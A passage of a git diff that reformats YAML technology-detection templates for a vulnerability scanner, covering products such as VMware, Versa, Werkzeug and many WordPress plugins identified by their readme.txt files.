"SOCKSPort" condition: and + - type: status status: - 501 diff --git a/http/technologies/tornado-server-login.yaml b/http/technologies/tornado-server-login.yaml index e6e773d171..463439dca9 100644 --- a/http/technologies/tornado-server-login.yaml +++ b/http/technologies/tornado-server-login.yaml @@ -7,11 +7,11 @@ info: description: Tornado server panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Tornado - Login" tags: panel,tornado,tech diff --git a/http/technologies/utility-service-detect.yaml b/http/technologies/utility-service-detect.yaml index d6b153a71a..62d7c32715 100644 --- a/http/technologies/utility-service-detect.yaml +++ b/http/technologies/utility-service-detect.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDK severity: info metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Utility Services Administration" tags: tech,avaya,aura diff --git a/http/technologies/vbulletin-detect.yaml b/http/technologies/vbulletin-detect.yaml index 535eb310fa..7d7962d073 100644 --- a/http/technologies/vbulletin-detect.yaml +++ b/http/technologies/vbulletin-detect.yaml @@ -8,8 +8,8 @@ info: reference: - https://www.vbulletin.com/ metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Powered By vBulletin" google-query: intext:"Powered By vBulletin" tags: tech,vbulletin diff --git a/http/technologies/versa-flexvnf-server.yaml b/http/technologies/versa-flexvnf-server.yaml index 15bd863c20..4645ad566d 100644 --- a/http/technologies/versa-flexvnf-server.yaml +++ b/http/technologies/versa-flexvnf-server.yaml @@ -8,9 +8,9 @@ info: Versa FlexVNF Server Detection (magic request params exposes Server signature/version) reference: - https://versa-networks.com/products/components/ - tags: tech,versa,flexvnf metadata: max-request: 1 + tags: tech,versa,flexvnf http: - method: GET @@ -19,6 +19,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/technologies/versa/versa-analytics-server.yaml b/http/technologies/versa/versa-analytics-server.yaml index f9971d7598..5c6b30b0aa 100644 --- a/http/technologies/versa/versa-analytics-server.yaml +++ b/http/technologies/versa/versa-analytics-server.yaml @@ -7,8 +7,8 @@ info: reference: - https://versa-networks.com/products/components/ metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: "Versa-Analytics-Server" tags: tech,versa,analytics diff --git a/http/technologies/versa/versa-director-api.yaml b/http/technologies/versa/versa-director-api.yaml index 4a8d090660..0d4350225f 100644 --- a/http/technologies/versa/versa-director-api.yaml +++ b/http/technologies/versa/versa-director-api.yaml @@ -8,8 +8,8 @@ info: reference: - https://versa-networks.com/products/components/ metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"Versa Networks" tags: api,versa,tech diff --git a/http/technologies/versa/versa-networks-detect.yaml b/http/technologies/versa/versa-networks-detect.yaml index 4f01828145..9a7f1215b5 100644 --- a/http/technologies/versa/versa-networks-detect.yaml +++ b/http/technologies/versa/versa-networks-detect.yaml @@ -7,8 +7,8 @@ info: reference: - https://versa-networks.com/products/components/ metadata: - max-request: 7 verified: true + max-request: 7 shodan-query: html:"Versa Networks" tags: tech,versa diff --git a/http/technologies/vivotex-web-console-detect.yaml b/http/technologies/vivotex-web-console-detect.yaml index c827733a39..a2c004dbf6 100644 --- a/http/technologies/vivotex-web-console-detect.yaml +++ b/http/technologies/vivotex-web-console-detect.yaml @@ -6,8 +6,8 @@ info: severity: info metadata: max-request: 1 - fofa-query: app="VIVOTEK-Web-Console" shodan-query: title:"VIVOTEK Web Console" + fofa-query: app="VIVOTEK-Web-Console" tags: tech,vivotex,console http: diff --git a/http/technologies/vmware/vmware-detect.yaml b/http/technologies/vmware/vmware-detect.yaml index 44338703aa..e412997cf3 100644 --- a/http/technologies/vmware/vmware-detect.yaml +++ b/http/technologies/vmware/vmware-detect.yaml @@ -8,9 +8,9 @@ info: reference: - https://www.pwndefend.com/2021/09/23/exposed-vmware-vcenter-servers-around-the-world-cve-2021-22005/ - https://svn.nmap.org/nmap/scripts/vmware-version.nse - tags: tech,vcenter,vmware metadata: max-request: 1 + tags: tech,vcenter,vmware http: - raw: diff --git a/http/technologies/vmware/vmware-horizon-version.yaml b/http/technologies/vmware/vmware-horizon-version.yaml index 107dc0eb33..55a4b0277b 100644 --- a/http/technologies/vmware/vmware-horizon-version.yaml +++ b/http/technologies/vmware/vmware-horizon-version.yaml @@ -5,8 +5,8 @@ info: author: veshraj severity: info metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Vmware Horizon" tags: vmware,tech diff --git a/http/technologies/vmware/vmware-site-recovery-manager.yaml b/http/technologies/vmware/vmware-site-recovery-manager.yaml index 758f6f534d..3789d40314 100644 --- a/http/technologies/vmware/vmware-site-recovery-manager.yaml +++ b/http/technologies/vmware/vmware-site-recovery-manager.yaml @@ -7,7 +7,7 @@ info: description: VMware Site Recovery Manger panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/technologies/vmware/vmware-vrealize-detect.yaml b/http/technologies/vmware/vmware-vrealize-detect.yaml index 4c04df75c1..bb541f3126 100644 --- a/http/technologies/vmware/vmware-vrealize-detect.yaml +++ b/http/technologies/vmware/vmware-vrealize-detect.yaml @@ -5,9 +5,9 @@ info: author: milo2012 severity: info description: Version of VMware vRealize Operations Manager - tags: vmware,vrealize,tech metadata: max-request: 1 + tags: vmware,vrealize,tech http: - method: GET diff --git a/http/technologies/waf-detect.yaml b/http/technologies/waf-detect.yaml index 1dcef86bc2..a1df52c27c 100644 --- a/http/technologies/waf-detect.yaml +++ b/http/technologies/waf-detect.yaml @@ -9,9 +9,9 @@ info: - https://github.com/Ekultek/WhatWaf classification: cwe-id: CWE-200 - tags: waf,tech,misc metadata: max-request: 1 + tags: waf,tech,misc http: - raw: diff --git a/http/technologies/web-ftp-detect.yaml b/http/technologies/web-ftp-detect.yaml index 16f1542df2..9e5b272c23 100644 --- a/http/technologies/web-ftp-detect.yaml +++ b/http/technologies/web-ftp-detect.yaml @@ -5,9 +5,9 @@ info: author: pussycat0x severity: info reference: https://www.exploit-db.com/ghdb/7013 - tags: webftp,tech,ftp metadata: max-request: 1 + tags: webftp,tech,ftp http: - method: GET @@ -20,6 +20,7 @@ http: words: - "Web-FTP" - "square login" + - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/technologies/weblogic-detect.yaml b/http/technologies/weblogic-detect.yaml index 2f4675f4e2..c1be328133 100644 --- a/http/technologies/weblogic-detect.yaml +++ b/http/technologies/weblogic-detect.yaml @@ -7,7 +7,7 @@ info: metadata: max-request: 1 shodan-query: product:"Oracle Weblogic" - tags: tech,weblogic + tags: tech,weblogic,intrusive http: - method: GET diff --git a/http/technologies/werkzeug-debugger-detect.yaml b/http/technologies/werkzeug-debugger-detect.yaml index a4f2b0f6f1..46fb045957 100644 --- a/http/technologies/werkzeug-debugger-detect.yaml +++ b/http/technologies/werkzeug-debugger-detect.yaml @@ -4,9 +4,9 @@ info: name: Werkzeug debugger console author: pdteam severity: info - tags: tech,werkzeug metadata: max-request: 1 + tags: tech,werkzeug http: - method: GET diff --git a/http/technologies/wms-server-detect.yaml b/http/technologies/wms-server-detect.yaml index b0995a3697..39bb1c8fec 100644 --- a/http/technologies/wms-server-detect.yaml +++ b/http/technologies/wms-server-detect.yaml @@ -5,8 +5,8 @@ info: author: pikpikcu severity: info metadata: - max-request: 1 verified: true + max-request: 1 fofa-query: app="WmsServer" tags: tech,wms,httpserver diff --git a/http/technologies/wondercms-detect.yaml b/http/technologies/wondercms-detect.yaml index 29af31fbd6..01026cc764 100644 --- a/http/technologies/wondercms-detect.yaml +++ b/http/technologies/wondercms-detect.yaml @@ -4,9 +4,9 @@ info: name: WonderCMS Detect author: pikpikcu severity: info - tags: tech,wondercms metadata: max-request: 1 + tags: tech,wondercms http: - method: GET diff --git a/http/technologies/wordpress-detect.yaml b/http/technologies/wordpress-detect.yaml index 8f881fac5c..da03e97728 100644 --- a/http/technologies/wordpress-detect.yaml +++ b/http/technologies/wordpress-detect.yaml @@ -5,11 +5,11 @@ info: author: pdteam,daffainfo,ricardomaia,topscoder,AdamCrosser severity: info metadata: - max-request: 4 verified: true - shodan-query: http.component:"WordPress" + max-request: 4 vendor: wordpress product: wordpress + shodan-query: http.component:"WordPress" category: cms tags: tech,wordpress,cms,wp @@ -24,6 +24,7 @@ http: redirects: true max-redirects: 2 stop-at-first-match: true + matchers-condition: and matchers: - type: regex diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 7cbd1855ae..3fd2256749 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/ad-inserter/readme.txt" diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 8d579ff23d..6a0d344b63 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/add-to-any/readme.txt" diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 4a6d8b7bbe..6fb5080bc8 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/admin-menu-editor/readme.txt" diff --git a/http/technologies/wordpress/plugins/adminimize.yaml b/http/technologies/wordpress/plugins/adminimize.yaml index e6a87da01d..531f397c5e 100644 --- a/http/technologies/wordpress/plugins/adminimize.yaml +++ b/http/technologies/wordpress/plugins/adminimize.yaml @@ -14,7 +14,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/adminimize/readme.txt" diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index e4eb308d39..cddbb4bb2e 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/advanced-custom-fields/readme.txt" diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index f68ad2a6bf..6f253f9f55 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/akismet/readme.txt" diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml index 10f104f2c7..42e8c167e5 100644 --- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml +++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/all-404-redirect-to-homepage/readme.txt" diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 8addc28ded..27527d2b48 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/all-in-one-seo-pack/readme.txt" diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 2e579621ac..28cff087cd 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/all-in-one-wp-migration/readme.txt" diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 41e297ffeb..9c07c65e4e 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/all-in-one-wp-security-and-firewall/readme.txt" diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 0dd8686ec3..92c8f5656e 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/amp/readme.txt" diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 359671f3bd..70975a19a1 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/antispam-bee/readme.txt" diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 116e0c420a..fd7e3e99dd 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/astra-sites/readme.txt" diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml index dc4703ef8d..c699796a1d 100644 --- a/http/technologies/wordpress/plugins/astra-widgets.yaml +++ b/http/technologies/wordpress/plugins/astra-widgets.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/astra-widgets/readme.txt" diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 1426ac3ef2..18f2a2ae84 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/autoptimize/readme.txt" diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 78d1651ff4..700823ccab 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/backwpup/readme.txt" diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index f7219b373d..df3c5f3a94 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/better-search-replace/readme.txt" diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index f688a68f72..dd930efc1a 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/better-wp-security/readme.txt" diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 00e95c4263..e532694167 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/black-studio-tinymce-widget/readme.txt" diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 212b2b13c4..4c6e616c1d 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/breadcrumb-navxt/readme.txt" diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 6318392c5c..a70a58690c 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/breeze/readme.txt" diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index e1a2a186e0..4e3c68c53a 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/broken-link-checker/readme.txt" diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 23614882a7..b1d8479d13 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/child-theme-configurator/readme.txt" diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 85965337cb..04e090313f 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/classic-editor/readme.txt" diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 33d903a1b4..57e618924b 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/classic-widgets/readme.txt" diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 3c6f8f287b..571b3b20a3 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/click-to-chat-for-whatsapp/readme.txt" diff --git a/http/technologies/wordpress/plugins/cloudflare.yaml b/http/technologies/wordpress/plugins/cloudflare.yaml index 425adf0bfe..3bd76bd0a8 100644 --- a/http/technologies/wordpress/plugins/cloudflare.yaml +++ b/http/technologies/wordpress/plugins/cloudflare.yaml @@ -14,7 +14,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/cloudflare/readme.txt" diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index c3b630cde2..4d562316b4 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/cmb2/readme.txt" diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index 5c8ce709b6..dcea952545 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/coblocks/readme.txt" diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index aea47b9e84..0ae2f18122 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/code-snippets/readme.txt" diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 78c584c388..12f549d536 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/coming-soon/readme.txt" diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 2c80d09c27..d8ea6a72f1 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/complianz-gdpr/readme.txt" diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4b1b3a8754..4afaf9dc97 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/contact-form-7-honeypot/readme.txt" diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 06ad83bdf7..88fea67f93 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/contact-form-7/readme.txt" diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index b20666268f..d205cdbf36 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/contact-form-cfdb7/readme.txt" diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index b2a097bfe7..fc9fe4e8fa 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/cookie-law-info/readme.txt" diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index c71fa258af..bcd63ced86 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/cookie-notice/readme.txt" diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 5a98e67597..7721d04c87 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/creame-whatsapp-me/readme.txt" diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 4463174203..961549d31a 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/creative-mail-by-constant-contact/readme.txt" diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index cfac0b961b..a923d21a15 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/custom-css-js/readme.txt" diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 846761f2f7..f10480fc8f 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/custom-fonts/readme.txt" diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 0def6e61ca..6c92091767 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/custom-post-type-ui/readme.txt" diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 5c5decc127..b25c6c9a9c 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/disable-comments/readme.txt" diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index a8229a338e..1781172d05 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/disable-gutenberg/readme.txt" diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 6559e64dce..92c8ce3409 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/duplicate-page/readme.txt" diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index a4368b8aa6..eea42ed8da 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/duplicate-post/readme.txt" diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index ec119e762a..eebbda34b9 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/duplicator/readme.txt" diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index b7ec7576a3..5e708b0ed1 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/duracelltomi-google-tag-manager/readme.txt" diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml index c42d679973..a8937cc312 100644 --- a/http/technologies/wordpress/plugins/easy-fancybox.yaml +++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/easy-fancybox/readme.txt" diff --git a/http/technologies/wordpress/plugins/easy-google-fonts.yaml b/http/technologies/wordpress/plugins/easy-google-fonts.yaml index 96c813ad49..9c46482fed 100644 --- a/http/technologies/wordpress/plugins/easy-google-fonts.yaml +++ b/http/technologies/wordpress/plugins/easy-google-fonts.yaml @@ -14,7 +14,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/easy-google-fonts/readme.txt" diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index fc44375947..03befac73e 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/easy-table-of-contents/readme.txt" diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index a1616c1741..e1f0093127 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -13,7 